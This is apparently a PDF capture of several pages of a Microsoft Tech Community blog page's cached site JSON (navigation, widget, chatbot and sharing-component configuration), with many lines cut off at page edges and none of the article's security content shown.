{"primaryDark":0.36,"primaryLight":0.74,"primaryLighter":0.89,"primaryLightest":0.95,"infoDark":0.39,"infoLight":0.72,"infoLighter":0.85,"infoLighte
shared/client/components/common/Loading/LoadingDot-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/Loading/LoadingDot-1775111751222","value":
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 24 of 38

{"title":"Loading..."},"localOverride":false},"CachedAsset:quilt:o365.prod:pages/blogs/BlogMessagePage:board:MicrosoftSentinelBlog-1775111749257":
{"__typename":"CachedAsset","id":"quilt:o365.prod:pages/blogs/BlogMessagePage:board:MicrosoftSentinelBlog-1775111749257","value":{"id":"BlogMessagePage","container":{"id":"Common","headerProps":
{"backgroundImageProps":null,"backgroundColor":null,"addComponents":null,"removeComponents":
["community.widget.bannerWidget"],"componentOrder":null,"__typename":"QuiltContainerSectionProps"},"headerComponentProps":
{"community.widget.breadcrumbWidget":
{"disableLastCrumbForDesktop":false}},"footerProps":null,"footerComponentProps":null,"items":[{"id":"blog-article","layout":"ONE_COLUMN","bgColor":null,"showTitle":null,"showDescription":null,"textPosition":null,"textColor":null,"sectionEditLevel":"LOC
{"main":[{"id":"blogs.widget.blogArticleWidget","className":"lia-blog-container","props":null,"__typename":"QuiltComponent"}],"__typename":"OneSectionColumns"}},{"id":"section-1729184836777","layout":"MAIN_SIDE","bgColor":"transparent","showTitle":false,"showDescription":false,"textPosition":"CENTER","textColor":"var
-lia-bs-body-color)","sectionEditLevel":null,"bgImage":null,"disableSpacing":null,"edgeToEdgeDisplay":null,"fullHeight":null,"showBorder":null,"__typename":"Ma
{"main":[],"side":[{"id":"custom.widget.UnregisteredCTAWidget","className":null,"props":
{"widgetVisibility":"anonymousOnly","useTitle":true,"useBackground":false,"title":"","lazyLoad":false,"widgetChooser":"custom.widget.UnregisteredCT
components/common/EmailVerification-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/common/EmailVerification-1775111751222","value":{"email.verification.title":"Email Verification
Required","email.verification.message.update.email":"To participate in the community, you must first verify your email
address. The verification email was sent to {email}. To change your email, visit My
Settings.","email.verification.message.resend.email":"To participate in the community, you must first verify your email
address. The verification email was sent to {email}. Resend email."},"localOverride":false},"CachedAsset:text:en_US-pages/blogs/BlogMessagePage-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-pages/blogs/BlogMessagePage-1775111751222","value":{"title":"{contextMessageSubject} |
{communityTitle}","errorMissing":"This blog post cannot be found","name":"Blog Message Page","section.blog-article.title":"Blog Post","archivedMessageTitle":"This Content Has Been Archived","section.section-1729184836777.title":"","section.section-1729184836777.description":"","section.CncIde.title":"Blog
Post","section.tifEmD.description":"","section.tifEmD.title":""},"localOverride":false},"CachedAsset:quiltWrapper:o365.prod:Common:1775111735108"
{"__typename":"CachedAsset","id":"quiltWrapper:o365.prod:Common:1775111735108","value":
{"id":"Common","header":{"backgroundImageProps":
{"assetName":null,"backgroundSize":"COVER","backgroundRepeat":"NO_REPEAT","backgroundPosition":"CENTER_CENTER","lastModified":null,"
[{"id":"community.widget.navbarWidget","props":
{"showUserName":true,"showRegisterLink":true,"useIconLanguagePicker":true,"useLabelLanguagePicker":true,"style":
{"boxShadow":"var(--lia-bs-box-shadow-sm)","linkFontWeight":"400","controllerHighlightColor":"hsla(30, 100%,
50%)","dropdownDividerMarginBottom":"10px","hamburgerBorderHover":"none","linkFontSize":"14px","linkBoxShadowHover":"none","backgroundO
-lia-border-radius-50)","hamburgerBgColor":"transparent","linkTextBorderBottom":"none","hamburgerColor":"var(--lia-nav-controller-icon-color)","brandLogoHeight":"30px","linkLetterSpacing":"normal","linkBgHoverColor":"transparent","collapseMenuDividerOpacity":0.16,"paddingBottom
solid var(--lia-bs-border-color)","hamburgerBorder":"none","dropdownPaddingX":"10px","brandMarginRightSm":"10px","linkBoxShadow":"none","linkJustifyContent":"flex-start","linkColor":"var(--lia-bs-body-color)","collapseMenuDividerBg":"var(--lia-nav-link-color)","dropdownPaddingTop":"10px","controllerTextColor":"var(--lia-nav-controller-icon-color)","controllerHighlightTextColor":"var(--lia-yiq-dark)","background":{"imageAssetName":"","color":"var(--lia-bs-white)","size":"COVER","repeat":"NO_REPEAT","position":"CENTER_CENTER","imageLastModified":""},"linkBorderRadius":"var(-
-lia-bs-border-radius-sm)","linkHoverColor":"var(--lia-bs-body-color)","position":"FIXED","linkBorder":"none","linkTextBorderBottomHover":"2px solid var(--lia-bs-primary)","brandMarginRight":"30px","hamburgerHoverColor":"var(--lia-nav-controller-icon-color)","linkBorderHover":"none","collapseMenuMarginLeft":"20px","linkFontStyle":"NORMAL","linkPaddingX":"10px","controllerTextHoverColor":
-lia-nav-controller-icon-hover-color)","paddingTop":"15px","linkPaddingY":"5px","linkTextTransform":"NONE","dropdownBorderColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)","controllerBgHoverColor":"hsla(var(--lia-bs-black-h), var(--
lia-bs-black-s), var(--lia-bs-black-l), 0.1)","linkDropdownPaddingX":"var(--lia-nav-link-px)","linkBgColor":"transparent","linkDropdownPaddingY":"9px","controllerIconColor":"var(--lia-bs-body-color)","dropdownDividerMarginTop":"10px","linkGap":"10px","controllerIconHoverColor":"var(--lia-bs-body-color)"},"links":{"sideLinks":[],"logoLinks":[],"mainLinks":[{"children":
[],"linkType":"INTERNAL","id":"gxcuf89792","params":{},"routeName":"CommunityPage"},{"children":
[],"linkType":"EXTERNAL","id":"community-hub-link","url":"/Directory","target":"SELF"},{"children":
[{"linkType":"INTERNAL","id":"Common-microsoft365-link","params":
{"categoryId":"microsoft365"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-windows-link","params":{"categoryId":"Windows"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-microsoft-security-link","params":{"categoryId":"microsoft-security"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-microsoft-teams-link","params":
{"categoryId":"MicrosoftTeams"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-azure-link","params":{"categoryId":"Azure"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 25 of 38

content_management-link","params":{"categoryId":"Content_Management"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-microsoftintune-link","params":
{"categoryId":"microsoftintune"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-exchange-link","params":{"categoryId":"Exchange"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-windows-server-link","params":{"categoryId":"Windows-Server"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-outlook-link","params":
{"categoryId":"Outlook"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-microsoft365-copilot-link","params":{"categoryId":"Microsoft365Copilot"},"routeName":"CategoryPage"},
{"linkType":"EXTERNAL","id":"Common_Enntvz-view-all-products-link","url":"/Directory","target":"SELF"}],"linkType":"EXTERNAL","id":"products-link","url":"/","target":"SELF"},
{"children":[{"linkType":"INTERNAL","id":"Common-education-sector-link","params":
{"categoryId":"EducationSector"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-partner-community-link","params":{"categoryId":"PartnerCommunity"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-healthcare-and-life-sciences-link","params":
{"categoryId":"HealthcareAndLifeSciences"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-i-t-ops-talk-link","params":{"categoryId":"ITOpsTalk"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-public-sector-link","params":
{"categoryId":"PublicSector"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-microsoftfor-nonprofits-link","params":{"categoryId":"MicrosoftforNonprofits"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-io-t-link","params":{"categoryId":"IoT"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-mvp-link","params":{"categoryId":"mvp"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-microsoft-mechanics-link","params":
{"categoryId":"MicrosoftMechanics"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-driving-adoption-link","params":{"categoryId":"DrivingAdoption"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-microsoft-learn-for-educators-link","params":{"categoryId":"microsoft-learn-for-educators"},"routeName":"CategoryPage"}],"linkType":"EXTERNAL","id":"topics-link","url":"/","target":"SELF"},
{"children":[],"linkType":"EXTERNAL","id":"all-blogs-link","url":"/Blogs","target":"SELF"},{"children":
[],"linkType":"EXTERNAL","id":"all-events-link","url":"/Events","target":"SELF"},{"children":
[{"linkType":"INTERNAL","id":"Skills-Hub-link","params":{"categoryId":"skills-hub"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Skills-Hub-Blog","params":{"boardId":"skills-hub-blog","categoryId":"skills-hub"},"routeName":"BlogBoardPage"},{"linkType":"EXTERNAL","id":"ms-learn-ext-LD","url":"/category/skills-hub?
tab=grouphub","target":"BLANK"},{"linkType":"EXTERNAL","id":"ms-learn-ext-dynamics","url":"https://docs.microsoft.com/learn/dynamics365/?WT.mc_id=techcom_header-webpage-m365","target":"BLANK"},{"linkType":"EXTERNAL","id":"ms-learn-ext-m365","url":"https://docs.microsoft.com/learn/m365/?wt.mc_id=techcom_header-webpage-m365","target":"BLANK"},
{"linkType":"EXTERNAL","id":"ms-learn-ext-security","url":"https://docs.microsoft.com/learn/topics/sci/?
wt.mc_id=techcom_header-webpage-m365","target":"BLANK"},{"linkType":"EXTERNAL","id":"ms-learn-ext-pp","url":"https://docs.microsoft.com/learn/powerplatform/?wt.mc_id=techcom_header-webpage-powerplatform","target":"BLANK"},{"linkType":"EXTERNAL","id":"ms-learn-ext-github","url":"https://docs.microsoft.com/learn/github/?wt.mc_id=techcom_header-webpage-github","target":"BLANK"},
{"linkType":"EXTERNAL","id":"ms-learn-ext-teams","url":"https://docs.microsoft.com/learn/teams/?
wt.mc_id=techcom_header-webpage-teams","target":"BLANK"},{"linkType":"EXTERNAL","id":"ms-learn-ext-net","url":"https://docs.microsoft.com/learn/dotnet/?wt.mc_id=techcom_header-webpage-dotnet","target":"BLANK"},
{"linkType":"EXTERNAL","id":"ms-learn-ext-azure","url":"https://docs.microsoft.com/learn/azure/?
WT.mc_id=techcom_header-webpage-m365","target":"BLANK"}],"linkType":"INTERNAL","id":"Skills-Hub","params":
{"categoryId":"skills-hub"},"routeName":"CategoryPage"},{"children":[{"linkType":"INTERNAL","id":"Common-community-info-center-link","params":{"categoryId":"Community-Info-Center"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-usergroups-link","params":
{"categoryId":"usergroups"},"routeName":"CategoryPage"},{"linkType":"INTERNAL","id":"Common-community-news-desk-link","params":{"categoryId":"CommunityNewsDesk"},"routeName":"CategoryPage"},
{"linkType":"INTERNAL","id":"Common-microsoft-global-community-initiative-link","params":{"categoryId":"microsoft-global-community-initiative"},"routeName":"CategoryPage"}],"linkType":"INTERNAL","id":"Common-gxcuf89792-
community","params":
{},"routeName":"CommunityPage"}]},"showSearchIcon":true,"languagePickerStyle":"iconAndLabel"},"__typename":"QuiltComponent"},
{"id":"community.widget.breadcrumbWidget","props":{"backgroundColor":"transparent","linkHighlightColor":"var(--lia-bs-primary)","visualEffects":{"showBottomBorder":true},"linkTextColor":"var(--lia-bs-gray-700)"},"__typename":"QuiltComponent"},{"id":"custom.widget.CommunityBanner","props":
{"widgetVisibility":"signedInOrAnonymous","useTitle":true,"usePageWidth":false,"useBackground":false,"title":"","lazyLoad":false},"__typename":"Qu
{"id":"custom.widget.ChatbotWidget","props":
{"customComponentId":"custom.widget.ChatbotWidget","cDisplay_form":true,"useBackground":false},"__typename":"QuiltComponent"},
{"id":"custom.widget.HeroBanner","props":
{"widgetVisibility":"signedInOrAnonymous","usePageWidth":false,"useTitle":true,"cMax_items":3,"useBackground":false,"title":"","lazyLoad":false,"w
{"backgroundImageProps":
{"assetName":null,"backgroundSize":"COVER","backgroundRepeat":"NO_REPEAT","backgroundPosition":"CENTER_CENTER","lastModified":null,"
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 26 of 38

[{"id":"custom.widget.SocialSharing","props":
{"widgetVisibility":"signedInOrAnonymous","useTitle":true,"useBackground":false,"title":"","lazyLoad":false},"__typename":"QuiltComponent"},
{"id":"custom.widget.MicrosoftFooter","props":
{"widgetVisibility":"signedInOrAnonymous","useTitle":true,"useBackground":false,"title":"","lazyLoad":false},"__typename":"QuiltComponent"}],"__ty
components/common/ActionFeedback-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/common/ActionFeedback-1775111751222","value":
{"joinedGroupHub.title":"Welcome","joinedGroupHub.message":"You are now a member of this group and are subscribed
to updates.","groupHubInviteNotFound.title":"Invitation Not Found","groupHubInviteNotFound.message":"Sorry, we could
not find your invitation to the group. The owner may have canceled the invite.","groupHubNotFound.title":"Group Not
Found","groupHubNotFound.message":"The grouphub you tried to join does not exist. It may have been
deleted.","existingGroupHubMember.title":"Already Joined","existingGroupHubMember.message":"You are already a
member of this group.","accountLocked.title":"Account Locked","accountLocked.message":"Your account has been locked
due to multiple failed attempts. Try again in {lockoutTime} minutes.","editedGroupHub.title":"Changes
Saved","editedGroupHub.message":"Your group has been
updated.","leftGroupHub.title":"Goodbye","leftGroupHub.message":"You are no longer a member of this group and will not
receive future updates.","deletedGroupHub.title":"Deleted","deletedGroupHub.message":"The group has been
deleted.","groupHubCreated.title":"Group Created","groupHubCreated.message":"{groupHubName} is ready to
use","accountClosed.title":"Account Closed","accountClosed.message":"The account has been closed and you will now be
redirected to the homepage","resetTokenExpired.title":"Reset Password Link has
Expired","resetTokenExpired.message":"Try resetting your password again","invalidUrl.title":"Invalid
URL","invalidUrl.message":"The URL you're using is not recognized. Verify your URL and try
again.","accountClosedForUser.title":"Account Closed","accountClosedForUser.message":"{userName}'s account is
closed","inviteTokenInvalid.title":"Invitation Invalid","inviteTokenInvalid.message":"Your invitation to the community has
been canceled or expired.","inviteTokenError.title":"Invitation Verification Failed","inviteTokenError.message":"The url you
are utilizing is not recognized. Verify your URL and try again","pageNotFound.title":"Access
Denied","pageNotFound.message":"You do not have access to this area of the community or it doesn't
exist","eventAttending.title":"Responded as Attending","eventAttending.message":"You'll be notified when there's new
activity and reminded as the event approaches","eventInterested.title":"Responded as
Interested","eventInterested.message":"You'll be notified when there's new activity and reminded as the event
approaches","eventNotFound.title":"Event Not Found","eventNotFound.message":"The event you tried to respond to does
not exist.","redirectToRelatedPage.title":"Showing Related Content","redirectToRelatedPageForBaseUsers.title":"Showing
Related Content","redirectToRelatedPageForBaseUsers.message":"The content you are trying to access is
archived","redirectToRelatedPage.message":"The content you are trying to access is
archived","relatedUrl.archivalLink.flyoutMessage":"The content you are trying to access is archived View Archived
Content"},"localOverride":false},"CachedAsset:component:custom.widget.CommunityBanner-en-us-1774591586939":
{"__typename":"CachedAsset","id":"component:custom.widget.CommunityBanner-en-us-1774591586939","value":
{"component":{"id":"custom.widget.CommunityBanner","template":
{"id":"CommunityBanner","markupLanguage":"REACT","style":null,"texts":null,"defaults":{"config":{"applicablePages":
[],"description":null,"fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[],"__typename":"ComponentProperties"},"components":
[{"id":"custom.widget.CommunityBanner","form":null,"config":null,"props":
[],"__typename":"Component"}],"grouping":"CUSTOM","__typename":"ComponentTemplate"},"properties":{"config":
{"applicablePages":[],"description":null,"fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[],"__typename":"ComponentProperties"},"form":null,"__typename":"Component","localOverride":false},"globalCss":null,"form":null},"localOverride":
en-us-1774591586939":{"__typename":"CachedAsset","id":"component:custom.widget.ChatbotWidget-en-us-1774591586939","value":{"component":{"id":"custom.widget.ChatbotWidget","template":
{"id":"ChatbotWidget","markupLanguage":"REACT","style":null,"texts":{"chatbot.references.title":"Related
Articles","chatbot.welcome.title":"Welcome!","chatbot.welcome.description":"I'm here to help you explore and discover
great content.","chatbot.welcome.prompt":"Ask me a question or choose a suggestion below to get
started:","chatbot.welcome.cta":"Let's dive in—what would you like to discover today?","chatbot.status.typing":"Assistant
is typing…","chatbot.status.error":"error","chatbot.error.response":"Failed to get response. Please try
again.","chatbot.error.processing":"There was an error processing your message.","chatbot.error.configuration":"API URL
not configured","chatbot.error.network":"Network error occurred. Please check your connection and try
again.","chatbot.error.timeout":"Request timed out. Please try again.","chatbot.error.emptyResponse":"I couldn't generate a
response. Please try rephrasing your question.","chatbot.buttons.send":"Send","chatbot.buttons.close":"Close
chat","chatbot.buttons.newChat":"Start new chat","chatbot.buttons.collapse":"Collapse chat
panel","chatbot.buttons.expand":"Expand chat panel","chatbot.buttons.fullscreen":"Enter
fullscreen","chatbot.buttons.exitFullscreen":"Exit fullscreen","chatbot.buttons.like":"Like this
response","chatbot.buttons.dislike":"Dislike this response","chatbot.buttons.removeLike":"Remove
like","chatbot.buttons.removeDislike":"Remove dislike","chatbot.aria.chatInput":"Chat
input","chatbot.aria.sendMessage":"Send message","chatbot.aria.openChat":"Open chat
assistant","chatbot.aria.closeChat":"Close chat assistant","chatbot.defaults.title":"Ask Tech
Community","chatbot.defaults.subtitle":"Ask questions – get answers","chatbot.defaults.entryHeading":"Find
answers","chatbot.defaults.entrySubtext":"Ask the agent","chatbot.defaults.placeholder":"Type your
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 27 of 38

message…","chatbot.defaults.initialMessage":"Hi! I'm your assistant. Ask me something or pick a suggestion above to
begin.","chatbot.suggestions.findBlogs":"Find insightful blogs","chatbot.suggestions.exploreEvents":"Explore upcoming
events","chatbot.suggestions.startJourney":"Start your journey with something new","chatbot.dialog.endConversation":"End
conversation","chatbot.dialog.confirmEndConversation":"Do you want to end this conversation and start
over?","chatbot.dialog.endConversationButton":"End
conversation","chatbot.dialog.cancel":"Cancel","chatbot.error.genericServiceUnavailable":"The service is currently
unavailable. Please try again later.","chatbot.error.noResults":"We could not find any information related to your query. Try
rephrasing your query."},"defaults":{"config":{"applicablePages":
[],"description":null,"fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[],"__typename":"ComponentProperties"},"components":
[{"id":"custom.widget.ChatbotWidget","form":null,"config":null,"props":
[],"__typename":"Component"}],"grouping":"CUSTOM","__typename":"ComponentTemplate"},"properties":{"config":
{"applicablePages":[],"description":null,"fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[],"__typename":"ComponentProperties"},"form":null,"__typename":"Component","localOverride":false},"globalCss":null,"form":null},"localOverride":
en-us-1774591586939":{"__typename":"CachedAsset","id":"component:custom.widget.HeroBanner-en-us-1774591586939","value":{"component":{"id":"custom.widget.HeroBanner","template":
{"id":"HeroBanner","markupLanguage":"REACT","style":null,"texts":{"searchPlaceholderText":"Search this
community","followActionText":"Follow","unfollowActionText":"Following","searchOnHoverText":"Please enter your
search term(s) and then press return key to complete a search.","blogs.sidebar.pagetitle":"Latest Blogs | Microsoft Tech
Community","followThisNode":"Follow this node","unfollowThisNode":"Unfollow this
node","customField.teamsLink.title":"Microsoft teams link","customField.teamsLink.label":"Teams meeting
url"},"defaults":{"config":{"applicablePages":
[],"description":null,"fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[{"id":"max_items","dataType":"NUMBER","list":false,"defaultValue":"3","label":"Max Items","description":"The
maximum number of items to display in the
carousel","possibleValues":null,"control":"INPUT","__typename":"PropDefinition"}],"__typename":"ComponentProperties"},"components":
[{"id":"custom.widget.HeroBanner","form":{"fields":
[{"id":"widgetChooser","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description
{"id":"title","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description":null,"possi
{"id":"useTitle","validation":null,"noValidation":null,"dataType":"BOOLEAN","list":null,"control":null,"defaultValue":null,"label":null,"description":nul
{"id":"useBackground","validation":null,"noValidation":null,"dataType":"BOOLEAN","list":null,"control":null,"defaultValue":null,"label":null,"descripti
{"id":"widgetVisibility","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description
{"id":"moreOptions","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description":n
{"id":"cMax_items","validation":null,"noValidation":null,"dataType":"NUMBER","list":false,"control":"INPUT","defaultValue":"3","label":"Max
Items","description":"The maximum number of items to display in the
carousel","possibleValues":null,"__typename":"FormField"}],"layout":{"rows":
[{"id":"widgetChooserGroup","type":"fieldset","as":null,"items":
[{"id":"widgetChooser","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":
{"id":"titleGroup","type":"fieldset","as":null,"items":[{"id":"title","className":null,"__typename":"FormFieldRef"},
{"id":"useTitle","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":null,"to
{"id":"useBackground","type":"fieldset","as":null,"items":
[{"id":"useBackground","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant"
{"id":"widgetVisibility","type":"fieldset","as":null,"items":
[{"id":"widgetVisibility","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant"
{"id":"moreOptionsGroup","type":"fieldset","as":null,"items":
[{"id":"moreOptions","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":nu
{"id":"componentPropsGroup","type":"fieldset","as":null,"items":
[{"id":"cMax_items","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":nu
[],"__typename":"Component"}],"grouping":"CUSTOM","__typename":"ComponentTemplate"},"properties":{"config":
{"applicablePages":[],"description":null,"fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[{"id":"max_items","dataType":"NUMBER","list":false,"defaultValue":"3","label":"Max Items","description":"The
maximum number of items to display in the
carousel","possibleValues":null,"control":"INPUT","__typename":"PropDefinition"}],"__typename":"ComponentProperties"},"form":
{"fields":
[{"id":"widgetChooser","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description
{"id":"title","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description":null,"possi
{"id":"useTitle","validation":null,"noValidation":null,"dataType":"BOOLEAN","list":null,"control":null,"defaultValue":null,"label":null,"description":nul
{"id":"useBackground","validation":null,"noValidation":null,"dataType":"BOOLEAN","list":null,"control":null,"defaultValue":null,"label":null,"descripti
{"id":"widgetVisibility","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description
{"id":"moreOptions","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description":n
{"id":"cMax_items","validation":null,"noValidation":null,"dataType":"NUMBER","list":false,"control":"INPUT","defaultValue":"3","label":"Max
Items","description":"The maximum number of items to display in the
carousel","possibleValues":null,"__typename":"FormField"}],"layout":{"rows":
[{"id":"widgetChooserGroup","type":"fieldset","as":null,"items":
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 28 of 38

[{"id":"widgetChooser","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":
{"id":"titleGroup","type":"fieldset","as":null,"items":[{"id":"title","className":null,"__typename":"FormFieldRef"},
{"id":"useTitle","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":null,"to
{"id":"useBackground","type":"fieldset","as":null,"items":
[{"id":"useBackground","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant"
{"id":"widgetVisibility","type":"fieldset","as":null,"items":
[{"id":"widgetVisibility","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant"
{"id":"moreOptionsGroup","type":"fieldset","as":null,"items":
[{"id":"moreOptions","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":nu
{"id":"componentPropsGroup","type":"fieldset","as":null,"items":
[{"id":"cMax_items","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":nu
{"fields":
[{"id":"widgetChooser","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description
{"id":"title","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description":null,"possi
{"id":"useTitle","validation":null,"noValidation":null,"dataType":"BOOLEAN","list":null,"control":null,"defaultValue":null,"label":null,"description":nul
{"id":"useBackground","validation":null,"noValidation":null,"dataType":"BOOLEAN","list":null,"control":null,"defaultValue":null,"label":null,"descripti
{"id":"widgetVisibility","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description
{"id":"moreOptions","validation":null,"noValidation":null,"dataType":"STRING","list":null,"control":null,"defaultValue":null,"label":null,"description":n
{"id":"cMax_items","validation":null,"noValidation":null,"dataType":"NUMBER","list":false,"control":"INPUT","defaultValue":"3","label":"Max
Items","description":"The maximum number of items to display in the
carousel","possibleValues":null,"__typename":"FormField"}],"layout":{"rows":
[{"id":"widgetChooserGroup","type":"fieldset","as":null,"items":
[{"id":"widgetChooser","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":
{"id":"titleGroup","type":"fieldset","as":null,"items":[{"id":"title","className":null,"__typename":"FormFieldRef"},
{"id":"useTitle","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":null,"to
{"id":"useBackground","type":"fieldset","as":null,"items":
[{"id":"useBackground","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant"
{"id":"widgetVisibility","type":"fieldset","as":null,"items":
[{"id":"widgetVisibility","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant"
{"id":"moreOptionsGroup","type":"fieldset","as":null,"items":
[{"id":"moreOptions","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":nu
{"id":"componentPropsGroup","type":"fieldset","as":null,"items":
[{"id":"cMax_items","className":null,"__typename":"FormFieldRef"}],"props":null,"legend":null,"description":null,"className":null,"viewVariant":nu
en-us-1774591586939":{"__typename":"CachedAsset","id":"component:custom.widget.UnregisteredCTAWidget-en-us-1774591586939","value":{"component":{"id":"custom.widget.UnregisteredCTAWidget","template":
{"id":"UnregisteredCTAWidget","markupLanguage":"REACT","style":null,"texts":{"register.communityHub":"Welcome to
the {name} Community Hub. Sign in to like, participate, or start a conversation.","register.category":"Welcome to the
{name} Community Hub. Sign in to like, participate, or start a conversation.","register.discussionBoard":"Welcome to the
{name} space. Sign in to like, reply, or start a discussion.","register.blogSpace":"Welcome to the {name} space. Sign in to
like or comment on articles in this space.","register.eventSpace":"Welcome to the {name} space. Sign in to RSVP, add
events to your calendar, and join the conversation.","register.ideaSpace":"Welcome to the {name} space. Sign in to vote,
comment, or submit your own feedback.","buttonRegister":"Sign in","register.discussionBoardArticle":"Have a question or
insight to share? Sign in to join the discussion.","register.blogSpaceArticle":"Enjoying the article? Sign in to share your
thoughts.","register.eventSpaceArticle":"Don’t just watch - take part. Sign in to RSVP, ask questions, and join the
discussion.","register.ideaSpaceArticle":"Sign in to submit ideas, upvote ideas, and join the conversation."},"defaults":
{"config":{"applicablePages":
[],"description":null,"fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[],"__typename":"ComponentProperties"},"components":
[{"id":"custom.widget.UnregisteredCTAWidget","form":null,"config":null,"props":
[],"__typename":"Component"}],"grouping":"CUSTOM","__typename":"ComponentTemplate"},"properties":{"config":
{"applicablePages":[],"description":null,"fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[],"__typename":"ComponentProperties"},"form":null,"__typename":"Component","localOverride":false},"globalCss":null,"form":null},"localOverride":
en-us-1774591586939":{"__typename":"CachedAsset","id":"component:custom.widget.SocialSharing-en-us-1774591586939","value":{"component":{"id":"custom.widget.SocialSharing","template":
{"id":"SocialSharing","markupLanguage":"HANDLEBARS","style":".sharePage {\n display: flex;\n justify-content:
center;\n background: #d7d7d7;\n padding: 0px;\n height: 60px;\n}\n.singleSocialIcons {\n display: flex;\n gap: 12px;\n list-style-type: none;\n padding: 0px;\n margin: 0;\n}\n.containers {\n display: flex;\n gap: 30px;\n}\n\n.listIcon {\n align-content: center;\n}\n.headingShare {\n display: inline;\n margin-right: 25px;\n margin-bottom: 0px;\n font-size: 20px;\n
font-weight: 550;\n align-content: center;\n}\n\n@media (max-width: 990px) {\n .sharePage {\n display: flex;\n justify-content: center;\n }\n\n .containers {\n display: inline-block;\n justify-content: center;\n align-content: center;\n align-items:
center;\n }\n .headingShare {\n display: flex;\n justify-content: center;\n }\n .singleSocialIcons {\n
}\n}\n","texts":null,"defaults":{"config":{"applicablePages":[],"description":"Adds buttons to share to various social media
websites","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
